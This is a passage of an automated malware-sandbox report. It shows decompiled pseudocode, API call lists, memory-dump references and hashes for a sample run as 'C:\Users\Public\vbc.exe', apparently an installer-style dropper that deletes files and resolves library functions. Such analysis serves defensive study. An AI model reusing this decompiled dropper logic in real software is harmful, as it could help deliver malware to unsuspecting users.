							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42afe0 - 0x5c;
					if( *0x42afe0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C22(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040541E(_t72);
							E004055E3(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404CC9(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404CC9(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405679();
						}
						L33:
						 *0x42ebe8 =  *0x42ebe8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                          0x0040525b
                                          0x0040525f
                                          0x00405268
                                          0x0040526b
                                          0x0040526e
                                          0x00405276
                                          0x00405278
                                          0x00405279
                                          0x00000000
                                          0x00405279
                                          0x00405288
                                          0x00405288
                                          0x0040528b
                                          0x0040528e
                                          0x004052a2
                                          0x004052a9
                                          0x004052ae
                                          0x004052b0
                                          0x004052c0
                                          0x004052b2
                                          0x004052b8
                                          0x004052b8
                                          0x004052c5
                                          0x004052c8
                                          0x004052d3
                                          0x004052d9
                                          0x004052de
                                          0x004052ee
                                          0x004052f0
                                          0x004052f6
                                          0x004052f9
                                          0x004052fc
                                          0x004053b9
                                          0x004053b9
                                          0x004053bd
                                          0x004053bf
                                          0x004053bf
                                          0x004053bf
                                          0x004053bf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405302
                                          0x00405302
                                          0x0040530b
                                          0x00405311
                                          0x00405316
                                          0x00405319
                                          0x0040531b
                                          0x0040531f
                                          0x00405321
                                          0x00405321
                                          0x0040531f
                                          0x00405324
                                          0x00405327
                                          0x0040533a
                                          0x0040533c
                                          0x00405341
                                          0x00405348
                                          0x00405360
                                          0x00405366
                                          0x0040536c
                                          0x0040536e
                                          0x00405393
                                          0x00405370
                                          0x00405370
                                          0x00405374
                                          0x00405388
                                          0x00405376
                                          0x00405379
                                          0x0040537e
                                          0x00405380
                                          0x00405381
                                          0x00405381
                                          0x00405374
                                          0x0040534a
                                          0x00405350
                                          0x00405352
                                          0x00405358
                                          0x00405358
                                          0x00405352
                                          0x00000000
                                          0x00405348
                                          0x00405329
                                          0x0040532c
                                          0x0040532e
                                          0x00000000
                                          0x00000000
                                          0x00405330
                                          0x00405332
                                          0x00000000
                                          0x00000000
                                          0x00405334
                                          0x00405338
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405398
                                          0x004053a2
                                          0x004053a8
                                          0x004053a8
                                          0x004053b3
                                          0x00000000
                                          0x004053b3
                                          0x004052ca
                                          0x004052d1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405290
                                          0x00405290
                                          0x00405292
                                          0x004053c3
                                          0x004053c6
                                          0x004053c9
                                          0x0040541b
                                          0x0040541b
                                          0x0040541b
                                          0x004053cb
                                          0x004053ce
                                          0x004053d9
                                          0x004053de
                                          0x004053e0
                                          0x00000000
                                          0x00000000
                                          0x004053e3
                                          0x004053e9
                                          0x004053ef
                                          0x004053f5
                                          0x004053f7
                                          0x00000000
                                          0x00405413
                                          0x004053f9
                                          0x004053fd
                                          0x00000000
                                          0x00000000
                                          0x00405402
                                          0x00405407
                                          0x00405408
                                          0x00000000
                                          0x00405409
                                          0x004053d0
                                          0x004053d0
                                          0x00000000
                                          0x004053d0
                                          0x00405298
                                          0x0040529c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040529c

                                          APIs
                                          • DeleteFileA.KERNEL32(?,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040526E
                                          • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052B8
                                          • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052D9
                                          • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052DF
                                          • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 004052F0
                                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                          • FindClose.KERNEL32(?), ref: 004053B3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-3287302484
                                          • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                          • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                          • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                          • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C49, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C49(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x4091f8);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                          0x00405c51
                                          0x00405c54
                                          0x00405c5b
                                          0x00405c63
                                          0x00405c70
                                          0x00000000
                                          0x00405c77
                                          0x00405c66
                                          0x00405c6e
                                          0x00000000
                                          0x00000000
                                          0x00405c7f

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                          • LoadLibraryA.KERNEL32(?), ref: 00405C66
                                          • GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                          • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                          • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                          • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C22, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405C22(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c028;
			}




                                          0x00405c2d
                                          0x00405c36
                                          0x00000000
                                          0x00405c43
                                          0x00405c39
                                          0x00000000

                                          APIs
                                          • FindFirstFileA.KERNEL32(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 00405C2D
                                          • FindClose.KERNEL32(00000000), ref: 00405C39
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                          • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                          • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                          • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100034C0, Relevance: 2900.4, APIs: 1, Strings: 1929, Instructions: 5367memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,11E1A300,00003000,00000004), ref: 1000C146
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                          • API String ID: 4275171209-2653676799
                                          • Opcode ID: 8a3e1f9331af22e966c7d278d15ab5bde30407bb771542784f8179ede418a07c
                                          • Instruction ID: 41c86983a65cc9443b19f2718a8bd7f2f6d262919ba3c90998d306329af863be
                                          • Opcode Fuzzy Hash: 8a3e1f9331af22e966c7d278d15ab5bde30407bb771542784f8179ede418a07c
                                          • Instruction Fuzzy Hash: 01144B1090DBEAC8EB32823C5C587DDAE611B23225F4843D9D1EC2A6D2C7B50BD5DF66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403489, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 213stringregistrylibraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00403489() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t59;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				struct HINSTANCE__* _t75;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t85;

				_t80 =  *0x42eb70; // 0x2903c0
				_t20 = E00405C49(6);
				_t87 = _t20;
				if(_t20 == 0) {
					_t78 = 0x429fd8;
					"1033" = 0x7830;
					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
					__eflags =  *0x429fd8;
					if(__eflags == 0) {
						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405889("1033",  *_t20() & 0x0000ffff);
				}
				E0040373D(_t75, _t87);
				_t24 =  *0x42eb78; // 0x80
				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x42ebe0 = _t24 & 0x00000020;
				if(E004054FF(_t87, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004054FF(_t95, _t84) == 0) {
						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
					}
					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040);
					 *0x42e348 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E0040373D(_t75, __eflags);
							__eflags =  *0x42ec00; // 0x0
							if(__eflags != 0) {
								_t31 = E00404D9B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42e32c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x429fb0, 5); // executed
							_t37 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x42e300);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42e300);
								 *0x42e324 = _t85;
								RegisterClassA(0x42e300);
							}
							_t39 =  *0x42e340; // 0x0
							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
							E0040140B(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42eb60; // 0x400000
						 *0x42e314 = _t28;
						_v20 = 0x624e5f;
						 *0x42e304 = E00401000;
						 *0x42e310 = _t75;
						 *0x42e324 =  &_v20;
						if(RegisterClassA(0x42e300) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t59 =  *0x42eb98; // 0x2939c0
					_t78 = 0x42db00;
					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
					_t61 =  *0x42db00; // 0x68
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42db01;
						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
						L15:
						E0040592B(_t84, E0040541E(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405465(_t78);
							goto L15;
						}
						_t95 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                          0x0040348f
                                          0x00403498
                                          0x0040349f
                                          0x004034a1
                                          0x004034b5
                                          0x004034c7
                                          0x004034d1
                                          0x004034d6
                                          0x004034dc
                                          0x004034ef
                                          0x004034ef
                                          0x004034fa
                                          0x004034a3
                                          0x004034ae
                                          0x004034ae
                                          0x004034ff
                                          0x00403504
                                          0x00403509
                                          0x00403512
                                          0x0040351e
                                          0x004035a5
                                          0x004035ad
                                          0x004035b6
                                          0x004035b6
                                          0x004035cc
                                          0x004035d2
                                          0x004035e0
                                          0x0040366f
                                          0x00403677
                                          0x00403681
                                          0x00403686
                                          0x0040368c
                                          0x0040370b
                                          0x00403710
                                          0x00403712
                                          0x0040372e
                                          0x00000000
                                          0x0040372e
                                          0x00403714
                                          0x0040371a
                                          0x00403722
                                          0x00403722
                                          0x00000000
                                          0x0040371a
                                          0x00403696
                                          0x004036a7
                                          0x004036a9
                                          0x004036ab
                                          0x004036b2
                                          0x004036b2
                                          0x004036ba
                                          0x004036c2
                                          0x004036c4
                                          0x004036c6
                                          0x004036cf
                                          0x004036d2
                                          0x004036d8
                                          0x004036d8
                                          0x004036de
                                          0x004036f7
                                          0x00403701
                                          0x00000000
                                          0x00403706
                                          0x00403679
                                          0x0040367b
                                          0x00000000
                                          0x004035e6
                                          0x004035e6
                                          0x004035ec
                                          0x004035f6
                                          0x004035fe
                                          0x00403608
                                          0x0040360e
                                          0x0040361c
                                          0x00403733
                                          0x00403733
                                          0x00000000
                                          0x00403733
                                          0x00403622
                                          0x0040362b
                                          0x0040366a
                                          0x00000000
                                          0x0040366a
                                          0x00403524
                                          0x00403524
                                          0x00403529
                                          0x00000000
                                          0x00000000
                                          0x0040352e
                                          0x00403533
                                          0x00403543
                                          0x00403548
                                          0x0040354f
                                          0x00000000
                                          0x00000000
                                          0x00403553
                                          0x00403555
                                          0x00403562
                                          0x00403562
                                          0x0040356a
                                          0x00403570
                                          0x00403598
                                          0x004035a0
                                          0x00000000
                                          0x00403582
                                          0x00403583
                                          0x0040358c
                                          0x00403592
                                          0x00403593
                                          0x00000000
                                          0x00403593
                                          0x0040358e
                                          0x00403590
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403590
                                          0x00403570

                                          APIs
                                            • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                            • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?), ref: 00405C66
                                            • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\Public\vbc.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                          • lstrlenA.KERNEL32(hnahgvbse,?,?,?,hnahgvbse,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\Public\vbc.exe" ), ref: 00403565
                                          • lstrcmpiA.KERNEL32(?,.exe,hnahgvbse,?,?,?,hnahgvbse,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                          • GetFileAttributesA.KERNEL32(hnahgvbse), ref: 00403583
                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 004035CC
                                            • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                          • RegisterClassA.USER32 ref: 00403613
                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                          • CreateWindowExA.USER32 ref: 00403664
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                          • LoadLibraryA.KERNEL32(RichEd20), ref: 004036A7
                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042E300), ref: 004036C2
                                          • GetClassInfoA.USER32(00000000,RichEdit,0042E300), ref: 004036CF
                                          • RegisterClassA.USER32(0042E300), ref: 004036D8
                                          • DialogBoxParamA.USER32 ref: 004036F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
